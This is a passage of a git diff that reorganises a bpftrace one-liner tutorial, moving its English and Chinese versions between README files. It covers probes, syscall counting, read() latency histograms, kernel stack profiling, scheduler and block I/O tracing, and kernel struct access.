}' @@ -25,12 +25,12 @@ hello world ^C ``` -打印欢迎消息。运行后, 按Ctrl-C结束。 +This prints a welcome message. Run it, then hit Ctrl-C to end. -- `BEGIN`是一个特殊的探针,在程序开始时触发探针执行(类似awk的BEGIN)。你可以使用它设置变量和打印消息头。 -- 探针可以关联动作,把动作放到{}中。这个例子中,探针被触发时会调用printf()。 +- The word `BEGIN` is a special probe that fires at the start of the program (like awk's BEGIN). You can use it to set variables and print headers. +- An action can be associated with probes, in { }. This example calls printf() when the probe fires. -# 3. 文件打开 +# Lesson 3. File Opens ``` # bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }' @@ -42,15 +42,18 @@ snmpd /proc/net/if_inet6 ^C ``` -这里我们在文件打开的时候打印进程名和文件名。 +This traces file opens as they happen, and we're printing the process name and pathname. -- 该命令以`tracepoint:syscalls:sys_enter_openat`开始: 这是tracepoint探针类型(内核静态跟踪),当进入`openat()`系统调用时执行该探针。相比kprobes探针(内核动态跟踪,在第6节介绍),我们更加喜欢用tracepoints探针,因为tracepoints有稳定的应用程序编程接口。注意:现代linux系统(glibc >= 2.26),`open`总是调用`openat`系统调用。 -- `comm`是内建变量,代表当前进程的名字。其它类似的变量还有pid和tid,分别表示进程标识和线程标识。 -- `args`是一个包含所有tracepoint参数的结构。这个结构是由bpftrace根据tracepoint信息自动生成的。这个结构的成员可以通过命令`bpftrace -vl tracepoint:syscalls:sys_enter_openat`找到。 -- `args.filename`用来获取args的成员变量`filename`的值。 -- `str()`用来把字符串指针转换成字符串。 +- It begins with the probe `tracepoint:syscalls:sys_enter_openat`: this is the tracepoint probe type (kernel static tracing), and is instrumenting when the `openat()` syscall begins (is entered). Tracepoints are preferred over kprobes (kernel dynamic tracing, introduced in lesson 6), since tracepoints have stable API. Note: In modern Linux systems (glibc >= 2.26) the `open` wrapper always calls the `openat` syscall. +- `comm` is a builtin variable that has the current process's name. Other similar builtins include pid and tid. +- `args` is a struct containing all the tracepoint arguments. This +struct is automatically generated by bpftrace based tracepoint information. The +members of this struct can be found with: `bpftrace -vl tracepoint:syscalls:sys_enter_openat`. +- `args.filename` accesses the `args` struct and gets the value of the + `filename` member. +- `str()` turns a pointer into the string it points to. -# 4. 进程级系统调用计数 +# Lesson 4. Syscall Counts By Process ``` bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' @@ -63,15 +66,15 @@ Attaching 1 probe... @[sshd]: 125 ``` -按Ctrl-C后打印进程的系统调用计数。 +This summarizes syscalls by process name, printing a report on Ctrl-C. -- @: 表示一种特殊的变量类型,称为map,可以以不同的方式来存储和描述数据。你可以在@后添加可选的变量名(如@num),用来增加可读性或者区分不同的map。 -- []: 可选的中括号允许设置map的关键字,比较像关联数组。 -- count(): 这是一个map函数 - 记录被调用次数。因为调用次数根据comm保存在map里,输出结果是进程执行系统调用的次数统计。 +- @: This denotes a special variable type called a map, which can store and summarize data in different ways. You can add an optional variable name after the @, eg "@num", either to improve readability, or to differentiate between more than one map. +- []: The optional brackets allow a key to be set for the map, much like an associative array. +- count(): This is a map function – the way it is populated. count() counts the number of times it is called. Since this is saved by comm, the result is a frequency count of system calls by process name. -Maps会在bpftrace结束(如按Ctrl-C)时自动打印出来。 +Maps are automatically printed when bpftrace ends (eg, via Ctrl-C). -# 5. read()返回值分布统计 +# Lesson 5. Distribution of read() Bytes ``` # bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }' @@ -89,14 +92,15 @@ Attaching 1 probe... [128, 256) 1 |@ ``` -这里统计进程号为18644的进程执行内核函数sys_read()的返回值,并打印出直方图。 -- /.../: 这里设置一个过滤条件(条件判断),满足该过滤条件时才执行{}里面的动作。在这个例子中意思是只追踪进程号为18644的进程。过滤条件表达式也支持布尔运算,如("&&", "||")。 -- ret: 表示函数的返回值。对于sys_read(),它可能是-1(错误)或者成功读取的字节数。 -- @: 类似于上节的map,但是这里没有key,即[]。该map的名称"bytes"会出现在输出中。 -- hist(): 一个map函数,用来描述直方图的参数。输出行以2次方的间隔开始,如`[128, 256)`表示值大于等于128且小于256。后面跟着位于该区间的参数个数统计,最后是ascii码表示的直方图。该图可以用来研究它的模式分布。 -- 其它的map函数还有lhist(线性直方图),count(),sum(),avg(),min()和max()。 +This summarizes the return value of the sys_read() kernel function for PID 18644, printing it as a histogram. -# 6. 内核动态跟踪read()返回的字节数 +- /.../: This is a filter (aka predicate), which acts as a filter for the action. The action is only executed if the filtered expression is true, in this case, only for the process ID 18644. Boolean operators are supported ("&&", "||"). +- ret: This is the return value of the function. For sys_read(), this is either -1 (error) or the number of bytes successfully read. +- @: This is a map similar to the previous lesson, but without any keys ([]) this time, and the name "bytes" which decorates the output. +- hist(): This is a map function which summarizes the argument as a power-of-2 histogram. The output shows rows that begin with interval notation, where, for example `[128, 256)` means that the value is: 128 <= value < 256. The next number is the count of occurrences, and then an ASCII histogram is printed to visualize that count. The histogram can be used to study multi-modal distributions. +- Other map functions include lhist() (linear hist), count(), sum(), avg(), min(), and max(). + +# Lesson 6. Kernel Dynamic Tracing of read() Bytes ``` # bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }' @@ -118,12 +122,12 @@ Attaching 1 probe... [2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | ``` -使用内核动态跟踪技术显示read()返回字节数的直方图。 +Summarize read() bytes as a linear histogram, and traced using kernel dynamic tracing. -- `kretprobe:vfs_read`: 这是kretprobe类型(动态跟踪内核函数返回值)的探针,跟踪`vfs_read`内核函数。此外还有kprobe类型的探针(在下一节介绍)用于跟踪内核函数的调用。它们是功能强大的探针类型,让我们可以跟踪成千上万的内核函数。然而它们是"不稳定"的探针类型:由于它们可以跟踪任意内核函数,对于不同的内核版本,kprobe和kretprobe不一定能够正常工作。因为内核函数名,参数,返回值和作用等可能会变化。此外,由于它们用来跟踪底层内核的,你需要浏览内核源代码,理解这些探针的参数和返回值的意义。 -- lhist(): 线性直方图函数:参数分别是value,最小值,最大值,步进值。第一个参数(`retval`)表示系统调用sys_read()返回值:即成功读取的字节数。 +- It begins with the probe `kretprobe:vfs_read`: this is the kretprobe probe type (kernel dynamic tracing of function returns) instrumenting the `vfs_read()` kernel function. There is also the kprobe probe type (shown in the next lesson), to instrument when functions begin execution (are entered). These are powerful probe types, letting you trace tens of thousands of different kernel functions. However, these are "unstable" probe types: since they can trace any kernel function, there is no guarantee that your kprobe/kretprobe will work between kernel versions, as the function names, arguments, return values, and roles may change. Also, since it is tracing the raw kernel, you'll need to browse the kernel source to understand what these probes, arguments, and return values, mean. +- lhist(): this is a linear histogram, where the arguments are: value, min, max, step. The first argument (`retval`) of vfs_read() is the return value: the number of bytes read. -# 7. read()调用的时间 +# Lesson 7. Timing read()s ``` # bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }' @@ -154,14 +158,15 @@ Attaching 2 probes... [1M, 2M) 1 | | ``` -根据进程名,以直方图的形式显示read()调用花费的时间,时间单位为纳秒。 +Summarize the time spent in read(), in nanoseconds, as a histogram, by process name. -- @start[tid]: 使用线程ID作为key。某一时刻,可能有许许多多的read调用正在进行,我们希望为每个调用记录一个起始时间戳。这要如何做到呢?我们可以为每个read调用建立一个唯一的标识符,并用它作为key进行统计。由于内核线程一次只能执行一个系统调用,我们可以使用线程ID作为上述标识符。 -- nsecs: 自系统启动到现在的纳秒数。这是一个高精度时间戳,可以用来对事件计时。 -- /@start[tid]/: 该过滤条件检查起始时间戳是否被记录。程序可能在某次read调用中途被启动,如果没有这个过滤条件,这个调用的时间会被统计为now-zero,而不是now-start。 -- delete(@start[tid]): 释放变量。 +- @start[tid]: This uses the thread ID as a key. There may be many reads in-flight, and we want to store a start timestamp to each. How? We could construct a unique identifier for each read, and use that as the key. But because kernel threads can only be executing one syscall at a time, we can use the thread ID as the unique identifier, as each thread cannot be executing more than one. +- nsecs: Nanoseconds since boot. This is a high resolution timestamp counter than can be used to time events. +- /@start[tid]/: This filter checks that the start time was seen and recorded. Without this filter, this program may be launched during a read and only catch the end, resulting in a time calculation of now - zero, instead of now - start. -# 8. 统计进程级别的事件 +- delete(@start[tid]): this frees the variable. + +# Lesson 8. Count Process-Level Events ``` # bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }' @@ -179,14 +184,14 @@ Attaching 25 probes... @[tracepoint:sched:sched_switch]: 510 ``` -这里统计5秒内进程级的事件并打印。 +Count process-level events for five seconds, printing a summary. -- sched: `sched`探针可以探测调度器的高级事件和进程事件如fork, exec和上下文切换。 -- probe: 探针的完整名称。 -- interval:s:5: 这是一个每5秒在每个CPU上触发一次的探针,它用来创建脚本级别的间隔或超时时间。 -- exit(): 退出bpftrace。 +- sched: The `sched` probe category has high-level scheduler and process events, such as fork, exec, and context switch. +- probe: The full name of the probe. +- interval:s:5: This is a probe that fires once every 5 seconds, on one CPU only. It is used for creating script-level intervals or timeouts. +- exit(): This exits bpftrace. -# 9. 分析内核实时函数栈 +# Lesson 9. Profile On-CPU Kernel Stacks ``` # bpftrace -e 'profile:hz:99 { @[kstack] = count(); }' @@ -211,12 +216,12 @@ secondary_startup_64+165 ]: 22122 ``` -以99赫兹的频率分析内核调用栈并打印次数统计。 +Profile kernel stacks at 99 Hertz, printing a frequency count. -- profile:hz:99: 这里所有cpu都以99赫兹的频率采样分析内核栈。为什么是99而不是100或者1000?我们想要抓取足够详细的内核执行时内核栈信息,但是频率太大影响性能。100赫兹足够了,但是我们不想用正好100赫兹,这样采样频率可能与其他定时事件步调一致,所以99赫兹是一个理想的选择。 -- kstack: 返回内核调用栈。这里作为map的关键字,可以跟踪次数。这些输出信息可以使用火焰图可视化。此外`ustack`用来分析用户级堆栈。 +- profile:hz:99: This fires on all CPUs at 99 Hertz. Why 99 and not 100 or 1000? We want frequent enough to catch both the big and small picture of execution, but not too frequent as to perturb performance. 100 Hertz is enough. But we don't want 100 exactly, as sampling may occur in lockstep with other timed activities, hence 99. +- kstack: Returns the kernel stack trace. This is used as a key for the map, so that it can be frequency counted. The output of this is ideal to be visualized as a flame graph. There is also `ustack` for the user-level stack trace. -# 10. 调度器跟踪 +# Lesson 10. Scheduler Tracing ``` # bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }' @@ -243,14 +248,14 @@ secondary_startup_64+165 ]: 305 ``` -这里统计进程上下文切换次数。以上输出被截断,只输出了最后两个结果。 +This counts stack traces that led to context switching (off-CPU) events. The above output has been truncated to show the last two only. -- sched: 跟踪调度类别的调度器事件:sched_switch, sched_wakeup, sched_migrate_task等。 -- sched_switch: 当线程释放cpu资源,当前不运行时触发。这里可能的阻塞事件:如等待I/O,定时器,分页/交换,锁等。 -- kstack: 内核堆栈跟踪,打印调用栈。 -- sched_switch在线程切换的时候触发,打印的调用栈是被切换出cpu的那个线程。像你使用其他探针一样,注意这里的上下文,例如comm, pid, kstack等等,并不一定反映了探针的目标的状态。 +- sched: The sched category has tracepoints for different kernel CPU scheduler events: sched_switch, sched_wakeup, sched_migrate_task, etc. +- sched_switch: This probe fires when a thread leaves CPU. This will be a blocking event: eg, waiting on I/O, a timer, paging/swapping, or a lock. +- kstack: A kernel stack trace. +- sched_switch fires in thread context, so that the stack refers to the thread who is leaving. As you use other probe types, pay attention to context, as comm, pid, kstack, etc, may not refer to the target of the probe. -# 11. 块级I/O跟踪 +# Lesson 11. Block I/O Tracing ``` # bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' @@ -279,15 +284,15 @@ Attaching 1 probe... ``` -以上是块I/O请求字节数的直方图。 +Block I/O requests by size in bytes, as a histogram. -- tracepoint:block: 块类别的跟踪点跟踪块级I/O事件。 -- block_rq_issue: 当I/O提交到块设备时触发。 -- args.bytes: 跟踪点block_rq_issue的参数成员bytes,表示提交I/O请求的字节数。 +- tracepoint:block: The block category of tracepoints traces various block I/O (storage) events. +- block_rq_issue: This fires when an I/O is issued to the device. +- args.bytes: This is a member from the tracepoint block_rq_issue arguments which shows the size in bytes. -该探针的上下文是非常重要的: 它在I/O请求被提交给块设备时触发。这通常发生在进程上下文,此时通过内核的comm可以得到进程名;也可能发生在内核上下文,(如readahead),此时不能显示预期的进程号和进程名信息。 +The context of this probe is important: this fires when the I/O is issued to the device. This often happens in process context, where builtins like comm will show you the process name, but it can also happen from kernel context (eg, readahead) when the pid and comm will not show the application you expect. -# 12. 内核结构跟踪 +# Lesson 12. Kernel Struct Tracing ``` # cat path.bt @@ -309,16 +314,15 @@ open path: retrans_time_ms [...] ``` +This uses kernel dynamic tracing of the vfs_open() function, which has a (struct path *) as the first argument. -这里使用内核动态跟踪技术跟踪vfs_read()函数,该函数的(struct path *)作为第一个参数。 +- kprobe: As mentioned earlier, this is the kernel dynamic tracing probe type, which traces the entry of kernel functions (use kretprobe to trace their returns). +- `arg0` is a builtin variable containing the first probe argument, the meaning of which is defined by the probe type. For `kprobe`, it is the first argument to the function. Other arguments can be accessed as arg1, ..., argN. +- `((struct path *)arg0)->dentry->d_name.name`: this casts `arg0` as `struct path *`, then dereferences dentry, etc. +- #include: these are necessary to include struct definitions for path and dentry on systems where the kernel was built without BTF (BPF Type Format) data. -- kprobe: 如前面所述,这是内核动态跟踪kprobe探针类型,跟踪内核函数的调用(kretprobe探针类型跟踪内核函数返回值)。 -- `arg0` 是一个内建变量,表示探针的第一个参数,其含义由探针类型决定。对于`kprobe`类型探针,它表示函数的第一个参数。其它参数使用arg1,...,argN访问。 -- `((struct path *)arg0)->dentry->d_name.name`: 这里`arg0`作为`struct path *`并引用dentry。 -- #include: 在没有BTF (BPF Type Format) 的情况下,包含必要的path和dentry类型声明的头文件。 +The kernel struct support is the same as bcc, making use of kernel headers. This means that many structs are available, but not everything, and sometimes it might be necessary to manually include a struct. For an example of this, see the [dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt), which includes a portion of struct nameidata manually as it wasn't in the available headers. If the kernel has BTF data, all kernel structs are always available. -bpftrace对内核结构跟踪的支持和bcc是一样的,允许使用内核头文件。这意味着大多数结构是可用的,但是并不是所有的,有时需要手动增加某些结构的声明。例如这个例子,见[dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt),包含struct nameidata的声明。倘若内核有提供BTF数据,则所有结构都可用。 +At this point you understand much of bpftrace, and can begin to use and write powerful one-liners. See the [Reference Guide](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md) for more capabilities. -现在,你已经理解了bpftrace的大部分功能,你可以开始使用和编写强大的一行命令。查阅[参考手册](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md)更多的功能。 - -> 原文地址:https://github.com/iovisor/bpftrace/blob/master/docs +> The original tutorial link: https://github.com/iovisor/bpftrace/blob/master/docs/ diff --git a/src/bpftrace-tutorial/README.zh.md b/src/bpftrace-tutorial/README.zh.md new file mode 100644 index 0000000..010f506 --- /dev/null +++ b/src/bpftrace-tutorial/README.zh.md @@ -0,0 +1,324 @@ +# bpftrace一行教程 + +该教程通过12个简单小节帮助你了解bpftrace的使用。每一小节都是一行的命令,你可以尝试运行并立刻看到运行效果。该教程系列用来介绍bpftrace的概念。关于bpftrace的完整参考,见[bpftrace手册](https://github.com/iovisor/bpftrace/blob/master/man/adoc/bpftrace.adoc)。 + +该教程贡献者是Brendan Gregg, Netflix (2018), 基于他的FreeBSD DTrace教程系列[DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial)。 + +# 1. 列出所有探针 + +``` +bpftrace -l 'tracepoint:syscalls:sys_enter_*' +``` + +"bpftrace -l" 列出所有探针,并且可以添加搜索项。 + +- 探针是用于捕获事件数据的检测点。 +- 搜索词支持通配符,如`*`和`?`。 +- "bpftrace -l" 也可以通过管道传递给grep,进行完整的正则表达式搜索。 + +# 2. Hello World + +``` +# bpftrace -e 'BEGIN { printf("hello world\n"); }' +Attaching 1 probe... +hello world +^C +``` + +打印欢迎消息。运行后, 按Ctrl-C结束。 + +- `BEGIN`是一个特殊的探针,在程序开始时触发探针执行(类似awk的BEGIN)。你可以使用它设置变量和打印消息头。 +- 探针可以关联动作,把动作放到{}中。这个例子中,探针被触发时会调用printf()。 + +# 3. 文件打开 + +``` +# bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s %s\n", comm, str(args.filename)); }' +Attaching 1 probe... +snmp-pass /proc/cpuinfo +snmp-pass /proc/stat +snmpd /proc/net/dev +snmpd /proc/net/if_inet6 +^C +``` + +这里我们在文件打开的时候打印进程名和文件名。 + +- 该命令以`tracepoint:syscalls:sys_enter_openat`开始: 这是tracepoint探针类型(内核静态跟踪),当进入`openat()`系统调用时执行该探针。相比kprobes探针(内核动态跟踪,在第6节介绍),我们更加喜欢用tracepoints探针,因为tracepoints有稳定的应用程序编程接口。注意:现代linux系统(glibc >= 2.26),`open`总是调用`openat`系统调用。 +- `comm`是内建变量,代表当前进程的名字。其它类似的变量还有pid和tid,分别表示进程标识和线程标识。 +- `args`是一个包含所有tracepoint参数的结构。这个结构是由bpftrace根据tracepoint信息自动生成的。这个结构的成员可以通过命令`bpftrace -vl tracepoint:syscalls:sys_enter_openat`找到。 +- `args.filename`用来获取args的成员变量`filename`的值。 +- `str()`用来把字符串指针转换成字符串。 + +# 4. 进程级系统调用计数 + +``` +bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' +Attaching 1 probe... +^C + +@[bpftrace]: 6 +@[systemd]: 24 +@[snmp-pass]: 96 +@[sshd]: 125 +``` + +按Ctrl-C后打印进程的系统调用计数。 + +- @: 表示一种特殊的变量类型,称为map,可以以不同的方式来存储和描述数据。你可以在@后添加可选的变量名(如@num),用来增加可读性或者区分不同的map。 +- []: 可选的中括号允许设置map的关键字,比较像关联数组。 +- count(): 这是一个map函数 - 记录被调用次数。因为调用次数根据comm保存在map里,输出结果是进程执行系统调用的次数统计。 + +Maps会在bpftrace结束(如按Ctrl-C)时自动打印出来。 + +# 5. read()返回值分布统计 + +``` +# bpftrace -e 'tracepoint:syscalls:sys_exit_read /pid == 18644/ { @bytes = hist(args.ret); }' +Attaching 1 probe... +^C + +@bytes: +[0, 1] 12 |@@@@@@@@@@@@@@@@@@@@ | +[2, 4) 18 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 30 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[64, 128) 19 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[128, 256) 1 |@ +``` + +这里统计进程号为18644的进程执行内核函数sys_read()的返回值,并打印出直方图。 +- /.../: 这里设置一个过滤条件(条件判断),满足该过滤条件时才执行{}里面的动作。在这个例子中意思是只追踪进程号为18644的进程。过滤条件表达式也支持布尔运算,如("&&", "||")。 +- ret: 表示函数的返回值。对于sys_read(),它可能是-1(错误)或者成功读取的字节数。 +- @: 类似于上节的map,但是这里没有key,即[]。该map的名称"bytes"会出现在输出中。 +- hist(): 一个map函数,用来描述直方图的参数。输出行以2次方的间隔开始,如`[128, 256)`表示值大于等于128且小于256。后面跟着位于该区间的参数个数统计,最后是ascii码表示的直方图。该图可以用来研究它的模式分布。 +- 其它的map函数还有lhist(线性直方图),count(),sum(),avg(),min()和max()。 + +# 6. 内核动态跟踪read()返回的字节数 + +``` +# bpftrace -e 'kretprobe:vfs_read { @bytes = lhist(retval, 0, 2000, 200); }' +Attaching 1 probe... +^C + +@bytes: +(...,0] 0 | | +[0, 200) 66 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[200, 400) 2 |@ | +[400, 600) 3 |@@ | +[600, 800) 0 | | +[800, 1000) 5 |@@@ | +[1000, 1200) 0 | | +[1200, 1400) 0 | | +[1400, 1600) 0 | | +[1600, 1800) 0 | | +[1800, 2000) 0 | | +[2000,...) 39 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +``` + +使用内核动态跟踪技术显示read()返回字节数的直方图。 + +- `kretprobe:vfs_read`: 这是kretprobe类型(动态跟踪内核函数返回值)的探针,跟踪`vfs_read`内核函数。此外还有kprobe类型的探针(在下一节介绍)用于跟踪内核函数的调用。它们是功能强大的探针类型,让我们可以跟踪成千上万的内核函数。然而它们是"不稳定"的探针类型:由于它们可以跟踪任意内核函数,对于不同的内核版本,kprobe和kretprobe不一定能够正常工作。因为内核函数名,参数,返回值和作用等可能会变化。此外,由于它们用来跟踪底层内核的,你需要浏览内核源代码,理解这些探针的参数和返回值的意义。 +- lhist(): 线性直方图函数:参数分别是value,最小值,最大值,步进值。第一个参数(`retval`)表示系统调用sys_read()返回值:即成功读取的字节数。 + +# 7. read()调用的时间 + +``` +# bpftrace -e 'kprobe:vfs_read { @start[tid] = nsecs; } kretprobe:vfs_read /@start[tid]/ { @ns[comm] = hist(nsecs - @start[tid]); delete(@start[tid]); }' +Attaching 2 probes... + +[...] +@ns[snmp-pass]: +[0, 1] 0 | | +[2, 4) 0 | | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 0 | | +[64, 128) 0 | | +[128, 256) 0 | | +[256, 512) 27 |@@@@@@@@@ | +[512, 1k) 125 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ | +[1k, 2k) 22 |@@@@@@@ | +[2k, 4k) 1 | | +[4k, 8k) 10 |@@@ | +[8k, 16k) 1 | | +[16k, 32k) 3 |@ | +[32k, 64k) 144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[64k, 128k) 7 |@@ | +[128k, 256k) 28 |@@@@@@@@@@ | +[256k, 512k) 2 | | +[512k, 1M) 3 |@ | +[1M, 2M) 1 | | +``` + +根据进程名,以直方图的形式显示read()调用花费的时间,时间单位为纳秒。 + +- @start[tid]: 使用线程ID作为key。某一时刻,可能有许许多多的read调用正在进行,我们希望为每个调用记录一个起始时间戳。这要如何做到呢?我们可以为每个read调用建立一个唯一的标识符,并用它作为key进行统计。由于内核线程一次只能执行一个系统调用,我们可以使用线程ID作为上述标识符。 +- nsecs: 自系统启动到现在的纳秒数。这是一个高精度时间戳,可以用来对事件计时。 +- /@start[tid]/: 该过滤条件检查起始时间戳是否被记录。程序可能在某次read调用中途被启动,如果没有这个过滤条件,这个调用的时间会被统计为now-zero,而不是now-start。 +- delete(@start[tid]): 释放变量。 + +# 8. 统计进程级别的事件 + +``` +# bpftrace -e 'tracepoint:sched:sched* { @[probe] = count(); } interval:s:5 { exit(); }' +Attaching 25 probes... +@[tracepoint:sched:sched_wakeup_new]: 1 +@[tracepoint:sched:sched_process_fork]: 1 +@[tracepoint:sched:sched_process_exec]: 1 +@[tracepoint:sched:sched_process_exit]: 1 +@[tracepoint:sched:sched_process_free]: 2 +@[tracepoint:sched:sched_process_wait]: 7 +@[tracepoint:sched:sched_wake_idle_without_ipi]: 53 +@[tracepoint:sched:sched_stat_runtime]: 212 +@[tracepoint:sched:sched_wakeup]: 253 +@[tracepoint:sched:sched_waking]: 253 +@[tracepoint:sched:sched_switch]: 510 +``` + +这里统计5秒内进程级的事件并打印。 + +- sched: `sched`探针可以探测调度器的高级事件和进程事件如fork, exec和上下文切换。 +- probe: 探针的完整名称。 +- interval:s:5: 这是一个每5秒在每个CPU上触发一次的探针,它用来创建脚本级别的间隔或超时时间。 +- exit(): 退出bpftrace。 + +# 9. 分析内核实时函数栈 + +``` +# bpftrace -e 'profile:hz:99 { @[kstack] = count(); }' +Attaching 1 probe... +^C + +[...] +@[ +filemap_map_pages+181 +__handle_mm_fault+2905 +handle_mm_fault+250 +__do_page_fault+599 +async_page_fault+69 +]: 12 +[...] +@[ +cpuidle_enter_state+164 +do_idle+390 +cpu_startup_entry+111 +start_secondary+423 +secondary_startup_64+165 +]: 22122 +``` + +以99赫兹的频率分析内核调用栈并打印次数统计。 + +- profile:hz:99: 这里所有cpu都以99赫兹的频率采样分析内核栈。为什么是99而不是100或者1000?我们想要抓取足够详细的内核执行时内核栈信息,但是频率太大影响性能。100赫兹足够了,但是我们不想用正好100赫兹,这样采样频率可能与其他定时事件步调一致,所以99赫兹是一个理想的选择。 +- kstack: 返回内核调用栈。这里作为map的关键字,可以跟踪次数。这些输出信息可以使用火焰图可视化。此外`ustack`用来分析用户级堆栈。 + +# 10. 调度器跟踪 + +``` +# bpftrace -e 'tracepoint:sched:sched_switch { @[kstack] = count(); }' +^C +[...] + +@[ +__schedule+697 +__schedule+697 +schedule+50 +schedule_timeout+365 +xfsaild+274 +kthread+248 +ret_from_fork+53 +]: 73 +@[ +__schedule+697 +__schedule+697 +schedule_idle+40 +do_idle+356 +cpu_startup_entry+111 +start_secondary+423 +secondary_startup_64+165 +]: 305 +``` + +这里统计进程上下文切换次数。以上输出被截断,只输出了最后两个结果。 + +- sched: 跟踪调度类别的调度器事件:sched_switch, sched_wakeup, sched_migrate_task等。 +- sched_switch: 当线程释放cpu资源,当前不运行时触发。这里可能的阻塞事件:如等待I/O,定时器,分页/交换,锁等。 +- kstack: 内核堆栈跟踪,打印调用栈。 +- sched_switch在线程切换的时候触发,打印的调用栈是被切换出cpu的那个线程。像你使用其他探针一样,注意这里的上下文,例如comm, pid, kstack等等,并不一定反映了探针的目标的状态。 + +# 11. 块级I/O跟踪 + +``` +# bpftrace -e 'tracepoint:block:block_rq_issue { @ = hist(args.bytes); }' +Attaching 1 probe... +^C + +@: +[0, 1] 1 |@@ | +[2, 4) 0 | | +[4, 8) 0 | | +[8, 16) 0 | | +[16, 32) 0 | | +[32, 64) 0 | | +[64, 128) 0 | | +[128, 256) 0 | | +[256, 512) 0 | | +[512, 1K) 0 | | +[1K, 2K) 0 | | +[2K, 4K) 0 | | +[4K, 8K) 24 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@| +[8K, 16K) 2 |@@@@ | +[16K, 32K) 6 |@@@@@@@@@@@@@ | +[32K, 64K) 5 |@@@@@@@@@@ | +[64K, 128K) 0 | | +[128K, 256K) 1 |@@ | + +``` + +以上是块I/O请求字节数的直方图。 + +- tracepoint:block: 块类别的跟踪点跟踪块级I/O事件。 +- block_rq_issue: 当I/O提交到块设备时触发。 +- args.bytes: 跟踪点block_rq_issue的参数成员bytes,表示提交I/O请求的字节数。 + +该探针的上下文是非常重要的: 它在I/O请求被提交给块设备时触发。这通常发生在进程上下文,此时通过内核的comm可以得到进程名;也可能发生在内核上下文,(如readahead),此时不能显示预期的进程号和进程名信息。 + +# 12. 内核结构跟踪 + +``` +# cat path.bt +#ifndef BPFTRACE_HAVE_BTF +#include +#include +#endif + +kprobe:vfs_open +{ + printf("open path: %s\n", str(((struct path *)arg0)->dentry->d_name.name)); +} + +# bpftrace path.bt +Attaching 1 probe... +open path: dev +open path: if_inet6 +open path: retrans_time_ms +[...] +``` + + +这里使用内核动态跟踪技术跟踪vfs_read()函数,该函数的(struct path *)作为第一个参数。 + +- kprobe: 如前面所述,这是内核动态跟踪kprobe探针类型,跟踪内核函数的调用(kretprobe探针类型跟踪内核函数返回值)。 +- `arg0` 是一个内建变量,表示探针的第一个参数,其含义由探针类型决定。对于`kprobe`类型探针,它表示函数的第一个参数。其它参数使用arg1,...,argN访问。 +- `((struct path *)arg0)->dentry->d_name.name`: 这里`arg0`作为`struct path *`并引用dentry。 +- #include: 在没有BTF (BPF Type Format) 的情况下,包含必要的path和dentry类型声明的头文件。 + +bpftrace对内核结构跟踪的支持和bcc是一样的,允许使用内核头文件。这意味着大多数结构是可用的,但是并不是所有的,有时需要手动增加某些结构的声明。例如这个例子,见[dcsnoop tool](https://github.com/iovisor/bpftrace/blob/master/docs/../tools/dcsnoop.bt),包含struct nameidata的声明。倘若内核有提供BTF数据,则所有结构都可用。 + +现在,你已经理解了bpftrace的大部分功能,你可以开始使用和编写强大的一行命令。查阅[参考手册](https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md)更多的功能。 + +> 原文地址:https://github.com/iovisor/bpftrace/blob/master/docs diff --git a/src/bpftrace-tutorial/README_en.md b/src/bpftrace-tutorial/README_en.md deleted file mode 100644 index bb5788b..0000000 --- a/src/bpftrace-tutorial/README_en.md +++ /dev/null @@ -1,328 +0,0 @@ -# The bpftrace One-Liner Tutorial - -This teaches you bpftrace for Linux in 12 easy lessons, where each lesson is a one-liner you can try running. This series of one-liners introduces concepts which are summarized as bullet points. For a full reference to bpftrace, see the [Man page](https://github.com/iovisor/bpftrace/blob/master/docs/../man/adoc/bpftrace.adoc) - -Contributed by Brendan Gregg, Netflix (2018), based on his FreeBSD [DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial). - -# Lesson 1. Listing Probes - -``` -bpftrace -l 'tracepoint:syscalls:sys_enter_*' -``` - -"bpftrace -l" lists all probes, and a search term can be added. - -- A probe is an instrumentation point for capturing event data. -- The supplied search term supports wildcards/globs (`*` and `?`) -- "bpftrace -l" can also be piped to grep(1) for full regular expression searching. - -# Lesson 2. Hello World - -``` -# bpftrace -e 'BEGIN { printf("hello world\n"); }' -Attaching 1 probe... -hello world -^C -``` - -This prints a welcome message. Run it, then hit Ctrl-C to end. - -- The word `BEGIN` is a special probe that fires at the start of the program (like awk's BEGIN). You can use it to set variables and print headers. -- An action can be associated with probes, in { }. This example calls printf() when the probe fires. - -# Lesson 3. File Opens - -``` -# bpftrace -e 